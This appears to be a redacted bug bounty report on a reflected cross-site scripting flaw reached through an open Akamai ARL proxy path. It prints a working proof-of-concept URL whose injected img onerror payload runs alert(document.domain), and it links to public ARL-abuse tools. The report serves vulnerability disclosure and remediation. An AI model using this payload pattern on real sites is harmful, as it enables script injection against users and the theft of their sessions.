Open Akamai ARL XSS at ████████

## Summary There is Open Akamai ARL XSS at ████ ## Proof-of-Concept https://█████████/7/0/33/1d/www.citysearch.com/search?what=Binit&where=Binit%22%3E%3Cimg%20src%3Dbinit%20onerror%3Dalert%28document.domain%29%3E ## References: - https://github.com/war-and-code/akamai-arl-hack - https://twitter.com/SpiderSec/status/1421176297548435459 - https://warandcode.com/post/akamai-arl-hack/ - https://github.com/cybercdh/goarl - https://community.akamai.com/customers/s/article/WebPerformanceV1V2ARLChangeStartingFebruary282021?language=en_US ## Impact Attackers can execute malicious JavaScript code in the target webpage. ## System Host(s) ███ ## Affected Product(s) and Version(s) ## CVE Numbers ## Steps to Reproduce https://██████/7/0/33/1d/www.citysearch.com/search?what=Binit&where=Binit%22%3E%3Cimg%20src%3Dbinit%20onerror%3Dalert%28document.domain%29%3E ## Suggested Mitigation/Remediation Actions Visit - https://community.akamai.com/customers/s/article/WebPerformanceV1V2ARLChangeStartingFebruary282021?language=en_US